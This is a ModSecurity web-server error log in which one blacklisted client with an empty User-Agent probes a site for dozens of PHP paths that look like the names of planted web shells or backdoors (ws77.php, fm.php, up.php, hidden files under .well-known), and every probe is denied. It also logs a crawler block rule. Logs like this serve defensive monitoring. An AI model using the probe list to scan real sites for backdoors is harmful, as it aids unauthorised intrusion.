[Tue May 26 13:11:48.517272 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:27925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws77.php"] [unique_id "ahVOvOvOeft4ltnLrH4yxgAAAF8"]
[Tue May 26 13:11:48.517374 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:27925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws77.php"] [unique_id "ahVOvOvOeft4ltnLrH4yxgAAAF8"]
[Tue May 26 13:11:48.660534 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/.well-known/acme-challenge/index.php"] [unique_id "ahVOvOvOeft4ltnLrH4yygAAADA"]
[Tue May 26 13:11:48.660668 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/.well-known/acme-challenge/index.php"] [unique_id "ahVOvOvOeft4ltnLrH4yygAAADA"]
[Tue May 26 13:11:48.726415 2026] [security2:error] [pid 496740:tid 496927] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOvOvOeft4ltnLrH4ytwAAADk"]
[Tue May 26 13:11:48.808035 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:28908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/admin/function.php"] [unique_id "ahVOvOvOeft4ltnLrH4y0gAAAFM"]
[Tue May 26 13:11:48.808128 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:28908] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/admin/function.php"] [unique_id "ahVOvOvOeft4ltnLrH4y0gAAAFM"]
[Tue May 26 13:11:48.950879 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:16151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/css/index.php"] [unique_id "ahVOvOvOeft4ltnLrH4y3QAAAGo"]
[Tue May 26 13:11:48.950995 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:16151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/css/index.php"] [unique_id "ahVOvOvOeft4ltnLrH4y3QAAAGo"]
[Tue May 26 13:11:49.097585 2026] [security2:error] [pid 496740:tid 496906] [client 20.151.117.104:59282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOvevOeft4ltnLrH4y4gAAACQ"]
[Tue May 26 13:11:49.168268 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:59282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xx.php"] [unique_id "ahVOvevOeft4ltnLrH4y6QAAAGg"]
[Tue May 26 13:11:49.168368 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:59282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xx.php"] [unique_id "ahVOvevOeft4ltnLrH4y6QAAAGg"]
[Tue May 26 13:11:49.316771 2026] [security2:error] [pid 496740:tid 496971] [client 20.151.117.104:54431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/about.php"] [unique_id "ahVOvevOeft4ltnLrH4y7QAAAGU"]
[Tue May 26 13:11:49.316883 2026] [security2:error] [pid 496740:tid 496971] [client 20.151.117.104:54431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/about.php"] [unique_id "ahVOvevOeft4ltnLrH4y7QAAAGU"]
[Tue May 26 13:11:49.459660 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:27682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-the.php"] [unique_id "ahVOvevOeft4ltnLrH4y9gAAAA8"]
[Tue May 26 13:11:49.459778 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:27682] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-the.php"] [unique_id "ahVOvevOeft4ltnLrH4y9gAAAA8"]
[Tue May 26 13:11:49.608080 2026] [security2:error] [pid 496740:tid 496962] [client 20.151.117.104:11984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws81.php"] [unique_id "ahVOvevOeft4ltnLrH4y_QAAAFw"]
[Tue May 26 13:11:49.608179 2026] [security2:error] [pid 496740:tid 496962] [client 20.151.117.104:11984] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws81.php"] [unique_id "ahVOvevOeft4ltnLrH4y_QAAAFw"]
[Tue May 26 13:11:49.758281 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:30908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/a1.php"] [unique_id "ahVOvevOeft4ltnLrH4zAQAAABE"]
[Tue May 26 13:11:49.758408 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:30908] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/a1.php"] [unique_id "ahVOvevOeft4ltnLrH4zAQAAABE"]
[Tue May 26 13:11:49.901368 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:27671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ca5.php"] [unique_id "ahVOvevOeft4ltnLrH4zCAAAAAE"]
[Tue May 26 13:11:49.901513 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:27671] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ca5.php"] [unique_id "ahVOvevOeft4ltnLrH4zCAAAAAE"]
[Tue May 26 13:11:50.043903 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:16153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/install.php"] [unique_id "ahVOvuvOeft4ltnLrH4zDwAAAGM"]
[Tue May 26 13:11:50.044022 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:16153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/install.php"] [unique_id "ahVOvuvOeft4ltnLrH4zDwAAAGM"]
[Tue May 26 13:11:50.187255 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:44965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/radio.php"] [unique_id "ahVOvuvOeft4ltnLrH4zFAAAAFM"]
[Tue May 26 13:11:50.187378 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:44965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/radio.php"] [unique_id "ahVOvuvOeft4ltnLrH4zFAAAAFM"]
[Tue May 26 13:11:50.335330 2026] [security2:error] [pid 496740:tid 496896] [client 20.151.117.104:16150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOvuvOeft4ltnLrH4zGAAAABo"]
[Tue May 26 13:11:50.407494 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-signin.php"] [unique_id "ahVOvuvOeft4ltnLrH4zIAAAAAc"]
[Tue May 26 13:11:50.407607 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-signin.php"] [unique_id "ahVOvuvOeft4ltnLrH4zIAAAAAc"]
[Tue May 26 13:11:50.447035 2026] [security2:error] [pid 496740:tid 496924] [client 216.244.66.241:46600] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hemilaminectomyaebc/cdcfdb805226.shtml"] [unique_id "ahVOvuvOeft4ltnLrH4zIgAAADY"]
[Tue May 26 13:11:50.447154 2026] [security2:error] [pid 496740:tid 496924] [client 216.244.66.241:46600] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hemilaminectomyaebc/cdcfdb805226.shtml"] [unique_id "ahVOvuvOeft4ltnLrH4zIgAAADY"]
[Tue May 26 13:11:50.551332 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:27952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/Ov-Simple1.php"] [unique_id "ahVOvuvOeft4ltnLrH4zJgAAAE0"]
[Tue May 26 13:11:50.551447 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:27952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/Ov-Simple1.php"] [unique_id "ahVOvuvOeft4ltnLrH4zJgAAAE0"]
[Tue May 26 13:11:50.694295 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:35570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/fm.php"] [unique_id "ahVOvuvOeft4ltnLrH4zKQAAAA4"]
[Tue May 26 13:11:50.694395 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:35570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/fm.php"] [unique_id "ahVOvuvOeft4ltnLrH4zKQAAAA4"]
[Tue May 26 13:11:50.837694 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:27924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ftde.php"] [unique_id "ahVOvuvOeft4ltnLrH4zLgAAAC0"]
[Tue May 26 13:11:50.837797 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:27924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ftde.php"] [unique_id "ahVOvuvOeft4ltnLrH4zLgAAAC0"]
[Tue May 26 13:11:50.979999 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:54424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/hplfuns.php"] [unique_id "ahVOvuvOeft4ltnLrH4zOwAAAGc"]
[Tue May 26 13:11:50.980106 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:54424] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/hplfuns.php"] [unique_id "ahVOvuvOeft4ltnLrH4zOwAAAGc"]
[Tue May 26 13:11:51.128315 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:40698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/log.php"] [unique_id "ahVOv-vOeft4ltnLrH4zPwAAAFo"]
[Tue May 26 13:11:51.128418 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:40698] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/log.php"] [unique_id "ahVOv-vOeft4ltnLrH4zPwAAAFo"]
[Tue May 26 13:11:51.277013 2026] [security2:error] [pid 496740:tid 496978] [client 20.151.117.104:59312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/test.php"] [unique_id "ahVOv-vOeft4ltnLrH4zQwAAAGw"]
[Tue May 26 13:11:51.277126 2026] [security2:error] [pid 496740:tid 496978] [client 20.151.117.104:59312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/test.php"] [unique_id "ahVOv-vOeft4ltnLrH4zQwAAAGw"]
[Tue May 26 13:11:51.337639 2026] [security2:error] [pid 496740:tid 496945] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOvuvOeft4ltnLrH4zOgAAAEs"]
[Tue May 26 13:11:51.420488 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:5466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/txets.php"] [unique_id "ahVOv-vOeft4ltnLrH4zTQAAAGM"]
[Tue May 26 13:11:51.420614 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:5466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/txets.php"] [unique_id "ahVOv-vOeft4ltnLrH4zTQAAAGM"]
[Tue May 26 13:11:51.563291 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:28870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin.php"] [unique_id "ahVOv-vOeft4ltnLrH4zVAAAAHw"]
[Tue May 26 13:11:51.563417 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:28870] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin.php"] [unique_id "ahVOv-vOeft4ltnLrH4zVAAAAHw"]
[Tue May 26 13:11:51.706316 2026] [security2:error] [pid 496740:tid 496991] [client 20.151.117.104:44965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-config-sample.php"] [unique_id "ahVOv-vOeft4ltnLrH4zVwAAAHk"]
[Tue May 26 13:11:51.706456 2026] [security2:error] [pid 496740:tid 496991] [client 20.151.117.104:44965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-config-sample.php"] [unique_id "ahVOv-vOeft4ltnLrH4zVwAAAHk"]
[Tue May 26 13:11:51.854802 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/packed.php"] [unique_id "ahVOv-vOeft4ltnLrH4zWQAAADk"]
[Tue May 26 13:11:51.854927 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/packed.php"] [unique_id "ahVOv-vOeft4ltnLrH4zWQAAADk"]
[Tue May 26 13:11:52.000315 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:37181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOv-vOeft4ltnLrH4zYQAAAGg"]
[Tue May 26 13:11:52.071224 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:37181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/adminfuns.php/.well-known/acme-challenge/file.php"] [unique_id "ahVOwOvOeft4ltnLrH4zagAAAEU"]
[Tue May 26 13:11:52.071339 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:37181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/adminfuns.php/.well-known/acme-challenge/file.php"] [unique_id "ahVOwOvOeft4ltnLrH4zagAAAEU"]
[Tue May 26 13:11:52.213801 2026] [security2:error] [pid 496740:tid 496895] [client 20.151.117.104:46271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ahax.php"] [unique_id "ahVOwOvOeft4ltnLrH4zcQAAABk"]
[Tue May 26 13:11:52.213923 2026] [security2:error] [pid 496740:tid 496895] [client 20.151.117.104:46271] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ahax.php"] [unique_id "ahVOwOvOeft4ltnLrH4zcQAAABk"]
[Tue May 26 13:11:52.362102 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:59288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/breads1.php"] [unique_id "ahVOwOvOeft4ltnLrH4zdQAAAG8"]
[Tue May 26 13:11:52.362249 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:59288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/breads1.php"] [unique_id "ahVOwOvOeft4ltnLrH4zdQAAAG8"]
[Tue May 26 13:11:52.506211 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:28890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/must.php"] [unique_id "ahVOwOvOeft4ltnLrH4zeQAAAFo"]
[Tue May 26 13:11:52.506336 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:28890] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/must.php"] [unique_id "ahVOwOvOeft4ltnLrH4zeQAAAFo"]
[Tue May 26 13:11:52.650033 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/up.php"] [unique_id "ahVOwOvOeft4ltnLrH4zgAAAAEE"]
[Tue May 26 13:11:52.650182 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/up.php"] [unique_id "ahVOwOvOeft4ltnLrH4zgAAAAEE"]
